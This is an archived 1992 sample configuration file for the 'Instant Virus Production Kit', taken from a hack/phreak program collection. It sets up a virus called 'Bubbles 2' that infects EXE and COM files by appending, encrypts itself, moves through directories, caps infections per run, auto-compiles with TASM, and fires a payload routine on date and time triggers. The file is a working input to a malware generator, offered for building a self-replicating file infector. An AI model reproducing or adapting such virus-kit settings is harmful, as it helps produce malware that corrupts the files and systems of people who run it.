home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
IVUPDAT2.ZIP
/
IVP17.ZIP
/
IVP.LZH
/
EXAMPLES.LZH
/
BUBBLES2.CFG
< prev
next >
Wrap
Text File
|
1992-12-27
|
3KB
|
99 lines
;****************************************************************************
;* This Is A Sample Configuration File For The Instant Virus Production Kit *
;* Written By Admiral Bailey [YAM] *
;****************************************************************************
; File for code to be written too.
F=Bubbles2.ASM
; Virus Name
V=Bubbles 2
; Authors Name
A=Admiral Bailey
; Infection type. [E]xe, [C]om, [B]oth, [T]rojan.
I=B
; [O]verwriting or [A]ppending upon infection.
G=A
; ID your virus uses for checking for infection. Must be two letters
W=AB
; Encryption?
E=Y
; Change Directories?
D=y
; Get COMMAND.COM?
C=n
; Largest size of a file that we should infect. In bytes.
; Put a zero if you dont want this option.
H=64000
; Smallest file to infect.
; Put a zero if you dont want this option.
J=600
; Set the int 24 handler?
B=y
; Max number of files to infect at runtime.
; Set K to zero if you want it to infect every file.
K=3
; Should IVP compile the source produced?
; Put Path if yes. Set to 0 if no.
L=c:\tasm
; Size of compiled file.
M=3000
; 'N' allows you to specify and strings you want displayed. Each line must
; use a new command. See docs for a better explanation.
N=Bubbles 2 : Its back and better then ever.
N= ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
N=Is it me or does that Make no sense at all?
;****************************************************************************
;* Activation Options *
;* Using 'N' will disable that option. *
;* If a '+' is at the end then it will activate if greater than the value. *
;* If a '-' is at the end then it will activate if less than the value. *
;* Putting nothing at the end will activate when equal to that value. *
;* Examples: *
;* O1=1993+ ------> Activate anytime after 1993 *
;* O3=12- ------> Activate if date is less than 12 *
;* O5=4 ------> Activate if its 4 am. *
;****************************************************************************
; Year
O1=1993+
; Month
O2=n
; Day of month
O3=13
; Day of the Week
O4=n
; Hour of Day
O5=13
; Minute
O6=N
; Second
O7=n
; File name with routine you will include.
; Comment the lines to nulify this command.
p=phasor.rtn
:START
cx,2
:END
;****************************************************************************
;* New Routines Not Put In Document. *
;****************************************************************************